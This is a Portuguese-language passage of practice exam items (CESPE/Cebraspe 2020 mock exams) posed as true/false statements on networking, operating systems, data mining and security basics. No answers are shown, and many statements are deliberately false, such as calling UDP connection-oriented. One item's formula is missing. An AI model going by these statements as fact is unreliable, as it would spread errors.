Disciplinas/Assuntos vinculados: Tecnologia da Informação > Sistema de Arquivos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 4º Simulado / Questão: 55
122. [Q1278536] Considerar que uma autenticação baseada em biometria é totalmente segura,
ou seja, impossível de ser burlada, é incorreto.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Vulnerabilidade.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 113
123. [Q1278526] O IPv6 é um protocolo da camada de rede, de 128 bits, com 8 grupos com 4
dígitos em notação decimal, separados por dois pontos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Configuração de redes.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 103
124. [Q1278531] Conhecido por ser utilizado em redes de computadores para prover a
sincronização da hora nosequipamentos, o NTP possui uma versão simplificada chamada de SNTP.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 108
125. [Q1278498] Em um sistema Windows, com o objetivo de reiniciar algum serviço, devemos
utilizar os comandos NET STOP e NET START.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 75
126. [Q1278499] Em um sistema Windows, com o objetivo de realizar a criação de um usuário
por meio do prompt de comando, utilizamos o comando adduser nome-do-usuario, entre outros
parâmetros de configuração.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 76
127. [Q1278501] Em um sistema Windows com a função Hyper-V habilitada, é desejável habilitar
uma VLAN em um dos switches virtuais existentes. Para isso, devemos realizar essa configuração
no Hyper-V Virtual Network Adapter.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Ferramentas de Virtualização (Hypervisores, VMWare,
Hyper-V etc.).
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 78
128. [Q1278508] Em um computador ou em uma estação de trabalho, é possível instalar apenas
um sistema operacional Windows ou um sistema operacional Linux, não sendo possível a existência
da instalação de ambos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 85
129. [Q1278513] Uma vez que o Linux é distribuído e protegido pela GPL (GNU General Public
License), sua estrutura é completamente livre de falhas e problemas de segurança, reduzindo
diversos custos para sua manutenção e suporte, além da necessidade de atualizações frequentes.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 90
130. [Q1278515] Em um sistema Linux, podemos utilizar o comando top para constatar quais os
processos estão consumindo mais memória e processamento.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 92
131. [Q1278484] Na arquitetura cliente-servidor, existem os fornecedores de recursos ou
serviços a rede, que são chamados de clientes, e existem os requerentes dos recursos ou serviços,
denominados servidores.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 61
132. [Q1278485] Um sistema distribuído pode ser conceituado como um sistema que possua
múltiplas UCPs interconectadas trabalhando em conjunto.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Sistemas Distribuídos (Cluster, GRID etc.).
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 62
133. [Q1278486] A computação distribuída traz diversas vantagens, como a possibilidade de
maior performance devido ao processamento paralelo e softwares menos complexos e mais simples
de serem desenvolvidos quando se compara ao modelo centralizado.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Sistemas distribuídos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 63
134. [Q1278487] Em um modelo cliente-servidor, a comunicação de requisição/ resposta pode
tanto seguir o modelo síncrono como o modelo assíncrono.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente/Servidor.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 64
135. [Q1278489] Um algoritmo é uma especificação da sequência ordenada de passos que deve
ser seguida para a realização de uma tarefa, garantindo a sua repetibilidade.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceito de Algoritmo.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 66
136. [Q1278492] Algoritmos podem ser representados por uma descrição narrativa, fluxograma
ou uma pseudolinguagem.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > A Representação de Algoritmos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 69
137. [Q1278474] A CPU é um componente presente nas placas de vídeo dos computadores e é
responsável pelo processamento das imagens nos monitores.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceitos e Funcionamento dos Processadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 51
138. [Q1278475] O barramento de um computador é o componente responsável por executar
praticamente todas as instruções necessárias para seu funcionamento.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceitos e Funcionamento dos Processadores.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 52
139. [Q1278476] São exemplos de memórias não-voláteis, o disco rígido, cartão SD e cache.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Memória.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 3º Simulado / Questão: 53
140. [Q1274793] Apriori é um dos algoritmos mais utilizados em tarefas de descoberta de regras
associativas (Association Rules), em mineração de dados (Data Mining).
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 3º Simulado / Questão: 137
Sobre Análise de Informações, julgue os itens a seguir.
141. [Q1274494] Em modelos dimensionais, a granularidade pode ser definida como o nível de
detalhamento dos dados armazenados.
c) Certo
e) ErradoDisciplinas/Assuntos vinculados: Tecnologia da Informação > Modelagem Conceitual de Dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 3º Simulado / Questão: 32
142. [Q1274495] Considere que um operador do Direito, por meio de uma ferramenta OLAP, está
analisando os dados de quantitativo de processos concluídos por ano, e decide avaliar os dados por
semestre e, em seguida, por mês. Neste caso podemos afirmar que o usuário realizou uma
operação de Drill-Down.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > OLAP.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 3º Simulado / Questão: 33
143. [Q1268341] No Linux, podemos executar o agendamento de um desligamento ou
reinicialização. Caso seja necessário que ocorra uma reinicialização nos próximos 10 minutos,
podemos utilizar o comando shutdown -r -10.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Linux ou Unix.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 92
144. [Q1268364] UDP (User Datagram Protocol) é um protocolo orientado a conexões, confiável,
que permite que um fluxo de dados entre duas máquinas conectadas em rede seja entregue sem
erros.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 101
145. [Q1268370] O TCP (Transmission Control Protocol) oferece um meio para as aplicações
enviarem datagramas IP encapsulados sem que seja necessário estabelecer uma conexão.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 107
146. [Q1268371] O modo de encapsulamento no IPSec no qual somente os dados do pacote
(payload) são criptografados, não contemplando o cabeçalho IP, é o modo túnel.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Outros.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 108
A respeito das licenças publicadas pela Free Software Foundation, analise as seguintes afirmações.
147. [Q1268326] A cobrança pelo uso de software protegido pela GPL (GNU General Public
License) é ilegal.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Responsabilidades e Direitos de Propriedade de um
Software.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 86
148. [Q1268318] Em um computador Windows, podemos habilitar a ferramenta de Shadow
Copies, que permite criar cópias de segurança de arquivos na máquina do usuário, tornando
possível manter um histórico de versões.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Windows.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 82
149. [Q1268288] A memória principal tem como função oferecer armazenamento interno ao
processador.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > HD (disco rígido), DVDs, CDs, etc..
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 60
150. [Q1268289] A arquitetura cliente-servidor é uma arquitetura de aplicativos centralizada,
pois centraliza tarefas ou cargas de trabalho em único provedor de serviço, chamado de servidor, a
partir de um único solicitante do serviço, chamado cliente.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Cliente-Servidor.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Procuradoria Geral do Distrito Federal PGDF - DF / Técnico Jurídico -
Especialidade:Tecnologia e Informação - 2º Simulado / Questão: 61
Acerca de Análise de Dados e Informações, julgue os itens seguintes, marcando C (Certo) ou E
(Errado).
151. [Q1223794] Considerando a regra associativa {Fralda} -> {Cerveja}, obtida por meio da
aplicação do algoritmo APriori numa base de dados de varejo, podemos afirmar que o fator de
suporte (Sup) da regra é calculada da seguinte forma:
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 1º Simulado / Questão: 136
152. [Q1223291] Dados armazenados em banco de dados relacionais são considerados dados não
estruturados.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Relacionamentos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área
Direito - 1º Simulado / Questão: 36
153. [Q1223292] Business Intelligence (BI) é um conjunto de métodos, de técnicas e de
ferramentas que são utilizados para transformar dados em informação e em conhecimento com
vistas a dar suporte ao processo de tomada de decisão.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Business Intelligence.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área
Direito - 1º Simulado / Questão: 37
154. [Q1222006] As raias representam executores ou combinações de executores, uma área
funcional, papel, ou em alguns casos uma organização externa, dividindo um diagrama de
processos em partes fisicamente separadas.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > BPMN - Business Process Model and Notation.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor Fiscal da Receita
Estadual - 1º Simulado / Questão: 85
155. [Q1222007] A análise de processo TO BE é aquela em que um processo existente é
melhorado e adaptado aos requisitos do cliente.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gerenciamento de Processos de Negócio.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor Fiscal da Receita
Estadual - 1º Simulado / Questão: 86
156. [Q1222008] O termo de abertura é o documento que autoriza formalmente o início do
projeto. Ele concede ao gerente de projetos a autoridade para aplicar os recursos organizacionais
nas atividades do projeto.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gestão de Projetos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor Fiscal da Receita
Estadual - 1º Simulado / Questão: 87
157. [Q1222012] Os princípios fundamentais da segurança da informação, também referidos
como pilares da segurança da informação são a confidencialidade, a integridade, a disponibilidade,
a autenticidade e o não repúdio.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Conceitos Básicos de Segurança.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Secretaria de Estado da Fazenda do Alagoas SEFAZ - AL / Auditor

Continue navegando